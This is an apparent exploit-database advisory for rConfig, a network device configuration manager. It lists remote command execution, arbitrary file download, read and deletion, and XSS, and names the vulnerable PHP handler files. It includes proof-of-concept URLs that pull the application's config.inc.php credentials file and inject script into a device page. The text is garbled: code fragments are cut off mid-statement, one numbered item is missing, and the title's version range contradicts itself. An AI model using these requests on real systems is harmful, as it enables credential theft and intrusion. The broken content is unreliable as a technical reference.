rConfig 3.1.1 <= 2.0 RCE & AFD & XSS Multiple Vulnerabilities http://www.rconfig.com/ rConfig is a free open source network device configuration management utility for network engineers to take frequent configuration snapshots of their network devices. rConfig is unique, because you choose what commands you want to run against your devices. Simply configure rConfig with the list of commands you wish to apply to a category of devices, and add devices to the category. Create a scheduled task, and rConfig will do the rest. rConfig Version 3 now has a Configuration Compliance Management utility to enable you to monitor device configurations for policy compliance. Vulnerabilities: =========================================================================== =========================================================================== 1. Remote Command Execution File: lib/ajaxHandlers/ajaxArchiveFiles.php Download here ?> PoC v2: http://demo.rconfig.com/v2/www/lib/crud/downloadFile.php?download_file=/home/r560544/demo/v2/config/config.inc.php 3. XSS: http://demo.rconfig.com/v2/www/devicemgmt.php?deviceId=168&device=XSS 4. Arbitrary file read File: lib/ajaxHandlers/ajaxGetFileByPath.php 5. Arbitrary File Deletion File: lib/ajaxHandlers/ajaxDeleteAllLoggingFiles.php 0) { $response = json_encode(array( 'failure' => true )); } else { $response = json_encode(array( 'success' => true )); } echo $response; ?> (there is much more) =========================================================================== =========================================================================== # Iranian Exploit DataBase = http://IeDb.Ir [2016-06-15]